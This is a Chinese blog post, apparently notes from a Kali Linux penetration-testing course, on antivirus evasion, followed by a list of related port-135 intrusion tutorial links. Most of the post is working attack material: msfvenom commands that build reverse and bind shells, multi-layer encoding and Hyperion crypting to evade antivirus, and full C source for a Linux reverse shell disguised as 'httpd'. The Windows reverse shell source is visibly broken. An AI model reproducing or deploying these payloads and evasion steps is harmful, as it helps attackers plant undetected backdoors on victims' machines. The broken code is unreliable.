Kali Linux渗透测试 135 免杀简介

最新推荐文章于 2024-08-20 14:55:31 发布
最新推荐文章于 2024-08-20 14:55:31 发布
阅读量3.7k 收藏 20
点赞数 2
分类专栏: kali-linux 文章标签: kali-linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Kevinhanser/article/details/79931655
版权

本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的《Kali Linux 渗透测试》课程

Kali Linux渗透测试(苑房弘)博客记录

1. 恶意软件

  • 病毒、木马、蠕虫、键盘激励、僵尸程序、流氓软件、勒索软件、广告程序
  • 在用户非自愿的情况下执行安装
    • 处于某种恶意的目的:控制、窃取、勒索、偷窥、推送、攻击……

2. 防病毒软件

  • 恶意程序最主要的防护手段

    • 杀毒软件/防病毒软件
    • 客户端/服务器/邮件防病毒

  • 检测原理

    • 基于二进制文件中特征签名的黑名单检测方法
    • 基于行为的分析方法(启发式)

  • 事后手段

    • 永远落后于病毒发展

3. 免杀技术

  • 修改二进制文件中的特征字符

    • 替换、擦除、修改

  • 加密技术(crypter)

    • 通过加密是的特征字符不可读,从而台币AV 检测
    • 运行时分片分段的解密执行,注入进程或 AV 不检查的无害文件中

  • 防病毒软件的检测

    • 恶意程序本身的特征字符
    • 加密器 cripter 的特征字符

4. 当前现状

  • 恶意软件制造者

    • 编写私有的 RAT 软件,避免普遍被 AV 所知的特征字符
    • 使用独有 crypter 软件加密恶意程序
    • 处事低调,尽量避免被发现
    • 没有能力自己编写恶意代码的黑客,通过直接修改特征码的方式免杀
    • Fully UnDetectable 还最高追求 (FUD)

  • AV 厂商

    • 广泛采集样本,尽快发现出现的病毒程序,更新病毒库
    • 一般新的恶意软件安全 UD 窗口期是一周左右
    • 乐毅软件制造者永无休止的拉锯战
    • 信的启发式检测技术尚有待完善(误杀漏杀)

  • 单一 AV 厂商的病毒库很难达到 100% 覆盖

  • 常用的 RAT 软件

    • 灰鸽子、波尔、黑暗彗星、潘多拉、NanoCore

5. 生成病毒程序

1. 生成程序

  • 生成反弹 shell

      root@kali:~# msfvenom -p windows/shell/bind_tcp lhost=10.10.10.131 lport=4444 -a x86 --platform win -f exe -o a.exe

  • 加密编码反弹 shell

      root@kali:~# msfvenom -p windows/shell/bind_tcp lhost=10.10.10.132 lport=4444 -f raw -e x86/shikata_ga_nai -i 5 | msfvenom -a x86 --platform windows -e x86/countdown -i 8  -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 9 -b '\x00' -f exe -o b.exe

  • 比较编码前后的检测率

    • 未经过编码的 a.exe 检测率是 45%

      在这里插入图片描述

    • 经过编码的 b.exe 检测率是 45% ,原因是检测引擎对所使用的编码软件的加密痕迹进行检查

      在这里插入图片描述

2. 隐藏 shell

  • 利用模板隐藏 shell

      root@kali:~# msfvenom -p windows/shell_reverse_tcp -x /usr/share/windows-binaries/plink.exe lhost=10.10.10.131 lport=4444 -a x86 --platform win -f exe -o c.exe

  • 多重编码

      root@kali:~# msfvenom -p windows/shell/bind_tcp -x /usr/share/windows-binaries/plink.exe lhost=10.10.10.131 lport=4444 -e x86/shikata_ga_nai -i 5 -a x86 --platform win -f exe > d.exe

  • 比较编码前后的检测率

    • 未经过编码的 c.exe 检测率是 40%

      在这里插入图片描述

    • 经过编码的 d.exe 检测率是 30%

      在这里插入图片描述

6. 软件保护

  • 软件开发商为保护版权,采用的混淆和加密技术避免盗版逆向

  • 常被恶意软件用于免杀目的

  • Hyperion (32bit PE 程序加密器)

  • Crypter / Container(解密器 PE Loader )

      root@kali:~# git clone https://github.com/nullsecuritynet/tools/raw/master/binary/hyperion/release/Hyperion-1.2.zip
  root@kali:~# unzip Hyperion-1.2.zip
  root@kali:~# dpkg --add-architecture i386 && apt-get update && apt-get install wine32

  # 生成加密器
  root@kali:~# cd Hyperion-1.2 && i686-w64-mingw32-g++ -static-libgcc -static-libstdc++ Src/Crypter/*.cpp -o h.exe
  
  # 生成木马程序
  root@kali:~# msfvenom -p windows/shell/reverse_tcp lhost=10.10.10.131 lport=4444 --platform win -e x86/shikata_ga_nai -a x86 -f exe -o p.exe

  # 对木马程序进行加密
  root@kali:~# wine h.exe p.exe x.exe

  • 比较编码前后的检测率

    • 未经过编码的 p.exe 检测率是 45%

      在这里插入图片描述

    • 未经过编码的 x.exe 检测率是 37%

      在这里插入图片描述

7. 自己编写后门

  • Windows reverse shell

      root@kali:~# wine gcc.exe windows.c -o windows.exe -lws2_32

  • Linux shell

      root@kali:~# gcc linux_revers_shell.c -o linux

  # 测试程序
  root@kali:~# nc -nvlp 333
  root@kali:~# ./linux 127.0.0.1 333

    在这里插入图片描述
    在这里插入图片描述

  • linux_revers_shell.c

      #include <stdio.h>
  #include <sys/socket.h>
  #include <arpa/inet.h>
  #include <stdlib.h>
  #include <string.h>
  #include <unistd.h>
  #include <netinet/in.h>
  
  int main(int argc, char *argv[])
  {
  	struct sockaddr_in sock;
  	int s;
  	if (argc != 3)
  	{
  		fprintf(stderr, "uso: <rhost> <rport>\n"); exit(1);
  	}
  	sock.sin_family  = AF_INET;
  	sock.sin_port = htons(atoi(argv[2]));
  	sock.sin_addr.s_addr = inet_addr(argv[1]);
  	s = socket(AF_INET, SOCK_STREAM, 0);
  	
  	connect(s,(struct sockaddr_in *)&sock, sizeof(struct sockaddr_in));
  	
  	dup2(s,0);
  	dup2(s,1);
  	dup2(s,2);
  	execl("/bin/sh","httpd",(char *)0); //precess httpd
  }

  • windows.c

      # 未修正错误
  #include <winsock2.h>
  #include <stdio.h>
  
  #pragma comment(lib,"ws2_32")
  
  	WSADATA wsaData;
  	SOCKET Winsock;
  	SOOKET Sock;
  	struct sockaddr_in hax;
  	char ip_addr[16];
  	STARTUPINFO ini_processo;
  	PROCESS_INFORMATION processo_info;
  	
  int main(int argc,char *argv[])
  	WSAStartup(MAKEWORD(2,2), wsaData);
  	winsock=WSASoket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,(unsigned int)NULL,(unsigned int)NULL);
  	
  	if (argc != 3)
  	{fprintf(stderr,"Uso: <rhost> <rport>\n";) exit(1);}
  	struct hostent *host;
  	host = gethostbyname(argv [1] );
  	strcpy(ip_addr,inet_ntoa(*((struct in_addr *)host->h_addr)));
  
  	hax.sin_family = AF_INET;
  	hax.sin_port = htons(atoi(argv[2]));
  	hax.sin_addr.s_addr = inet_addr(ip_addr);
  
  	WSAConnect(Winsock,(SOCKADDR* &hax,sizeof(hax),NULL,NULL,NULL,NULL;
  	memset(&ini_processo,0,sizeof(ini_processo));
  	ini_processo.cb = sizeof(ini_processo);
  	ini_processo.dwFlags = START_USESTDHANDLES;
  	ini_processo.hStdInput = ini_processo.hStdOutput = ini_processo.hStdError = (HANDLE)Winsock;
  	CreateProcess(NULL,"cmd exe",NULL,NULL,TRUE,0,NULL,NULL,&ini_processo,&process_info);

    在这里插入图片描述

网络安全打工人
关注
专栏目录
kali linux135漏洞,Kali Linux渗透基础知识整理(二):漏洞扫描
weixin_34182361的博客
05-16 1706
漏洞扫描网络流量NmapHping3NessuswhatwebDirBusterjoomscanWPScan网络流量网络流量就是网络上传输的数据量。TCP协议TCP是因特网中的传输层协议,使用三次握手协议建立连接。当主动方发出SYN连接请求后,等待对方回答SYN+ACK ,并最终对对方的 SYN 执行 ACK 确认。这种建立连接的方法可以防止产生错误的连接,TCP使用的流量控制协议是可变大小的滑动...
135端口的入侵教程,很搞的教材,对于学习挺实用的。
04-10
135端口的入侵教程,很搞的教材,对于学习挺实用的。
实战入侵校园实验平台
qq_42383069的博客
11-24 6951
目标机:172.18.206.87(学校内网) 网址:www.manage.vslab… 9.26号和老师谈论了仿真实验网站的安全性,经过老师的允许,我开始有了寻找漏洞的想法。 寻寻觅觅,一时间来到了10月中旬, 首先看到它有上传功能,便想到了上传一句话木马,从响应头看到它是jsp写的,然后上传jsp大马,抓包改后缀,但是,没有返回路径????真的难受啊,折腾了好几天,最终,放弃吧…(后来我发现原...
kali制作安卓免杀木马——kali工具绑捆
最新发布
2301_79614903的博客
08-20 927
官网:https://www.shellterproject.com/ 目前最新版本是7.2,主程序是.exe文件所以在windows下可以直接使用,在linux上运行的话。就需要安装wine环境来运行。Choose Operation Mode – Auto/Manual (A/M/H):A //选择模式 A 自动模式自动注入后门,M高级模式,H帮助。现在我们打开shellter就可以打开运行了,工具安装完成后再/usr/share/windows-resources/shellter 这个文件夹。
135端口入侵教程(仅学习用)
sc8001的专栏
05-27 1万+
大家好我是sc8001(引用)今天给大家带来的是135端口入侵教程!前几天看的教程都是要通过TELNET连接才可以下载到肉鸡上,现在给大家带来的是不用TELNET连接,直接给肉鸡下载木马要用到的工具是:Recton V2.5    连接用的 NTscan      扫描用的一个免杀的木马(我这里用鸽子!)首先打开NTscan,输入一个要扫描的网段,选WMI扫描 端口135然后开始!为了节省时间我
135端口的入侵及入侵过程中常见的情况
10-16
135端口的入侵相关问题 很好的一个135端口入侵解析,希望朋友们多多支持!
2024年攻击端口渗透剖析_135端口渗透,搜狐新闻客户端网络安全面试题
2401_84264630的博客
05-11 1307
(https://www.seebug.org/vuldb/ssvid-96718)(2)使用DNS欺骗攻击,可对DNS域名服务器进行欺骗,如果黑客再配合网页木马进行挂马攻击,无疑是一种杀伤力很强的攻击,黑客可不费吹灰之力就控制内网的大部分主机。在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。(1)查找存在RPC溢出的主机,进行远程溢出攻击,直接获得系统权限。
网络安全最新攻击端口渗透剖析_135端口渗透(2),2024年最新卧槽
2401_84264096的博客
05-10 1471
1433是SQLServer默认的端口,SQL Server服务使用两个端口:tcp-1433、UDP-1434.其中1433用于供SQLServer对外提供服务,1434用于向请求者返回SQLServer使用了哪些TCP/IP端口。1433端口通常遭到黑客的攻击,而且攻击的方式层出不穷。最严重的莫过于远程溢出漏洞了,如由于SQL注射攻击的兴起,各类数据库时刻面临着安全威胁。利用SQL注射技术对数据库进行渗透是目前比较流行的攻击方式,此类技术属于脚本渗透技术。
利用135端口快速入侵个人PC电脑
热门推荐
chaojixiaojingang
09-14 3万+
       了解135端口之后,才知道该端口是个高危端口,存在一些漏洞,下面我要说的就是利用135端口漏洞得到内网Windows 2000和Windows XP系统主机的用户名和密码。 135端口概述:        Microsoft在这个端口运行DCE RPC end-point mapper为它的DCOM服务。这与UNIX 111端口的功能很相似。使用DCOM和RPC的服务利用计算机上...
Kali Linux渗透测试技术详解
02-19
第1篇为Iinux安全渗透测试基础,介绍了Linux安全透简介、安装及配置KaliLinux 操作系统、配置目标测试系统:第2篇为信息的收集及利用,介绍了信息收集、漏洞扫描、漏洞利用等技术:第3篇为各种渗透测试,介绍了权限...
基于Kali Linux渗透测试.pdf
09-06
5. Kali Linux渗透测试平台 Kali Linux是一个基于Linux渗透测试平台,提供了大量的渗透测试工具和技术。Kali Linux可以帮助测试人员快速地进行渗透测试,并对系统的安全性进行评估。 6. 渗透测试的优势 渗透...
2010年最新利用135端口入侵网吧主机教程
03-06
2010年最新利用135端口入侵网吧主机教程 后续在给大家做个传马上线教程
Kali Linux渗透测试高级篇.rar
09-12
Kali Linux 是一款专门用于IT安全评估的Linux操作系统。目前作为被欢迎的Linux操作系统广泛用于安全评估项目中,其中提供600+安全工具,...课程主要内容:学习Kali Linux安全测试使用工具的使用,以及高级技巧的使用
Kali Linux渗透测试(安全牛).txt
04-17
│ 任务001:Kali Linux渗透测试介绍.mp4 │ ├─第2章 Kali安装 │ 任务002:Kali Linux安装-硬盘安装、虚拟机安装.mp4 │ 任务003:Kali Linux 安装-持久加密USB安装、熟悉环境、熟悉BASH命令.mp4 │ 任务004:...
Kali Linux高级渗透测试 _2016.05_罗伯特_KaliLinux高级渗透测试_渗透_完整版_
09-29
P226
【内网安全】135端口的入侵与防御
不忘初心,护天下安全!
02-12 4250
一、135端口 135端口主要用于使用RPC(Remote Procedure Call,远程过程调用)协议并提供DCOM(分布式组件对象模型)服务,通过RPC可以保证在一台计算机上运行的程序可以顺利地执行远程计算机上的代码;使用DCOM可以通过网络直接进行通信,能够包括HTTP协议在内的多种网络传输。 二、扫描135端口漏洞 1.首先,我们扫描局域网内开启135端口的主机,这里我使用自己最...
利用135端口的思路
jammny
05-28 1万+
前言: 通过135端口入侵实际上是利用RPC漏洞来攻击计算机的。一般情况下135端口主要用于使用RPC(Remote Procedure Call,远程过程调用)协议并提供DCOM(分布式组件对象模型)服务,通过RPC可以保证在一台计算机上运行的程序可以顺利地 执行远程计算机上的代码;使用DCOM可以通过网络直接进行通信,能够跨包括HTTP协议在内的多种网络传输。RPC本身在处理通过TCP/IP的消息交换部分有一个漏洞,该漏洞是由于错误地处理格式不正确的消息造成的。会影响到RPC与DCOM之间的一个接口,
渗透测试常见端口总结
2301_79977730的博客
04-09 1556
当然这也是系统合法的服务,通常是不会被杀毒软件所查杀的。1521是大型数据库Oracle的默认监听端口,估计新手还对此端口比较陌生,平时大家接触的比较多的是Access,MSSQL以及MYSQL这三种数据库。目前黑客对80端口的攻击典型是采用SQL注入的攻击方法,脚本渗透技术也是一项综合性极高的web渗透技术,同时脚本渗透技术对80端口也构成严重的威胁。telnet是一种旧的远程管理方式,使用telnet工具登录系统过程中,网络上传输的用户和密码都是以明文方式传送的,黑客可使用嗅探技术截获到此类密码。
端口入侵教程
FrancisGief的专栏
07-08 2705
请下载附件 注,本教程并非本人编写,代理帮朋友转载若转载请联系QQ2825385813
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值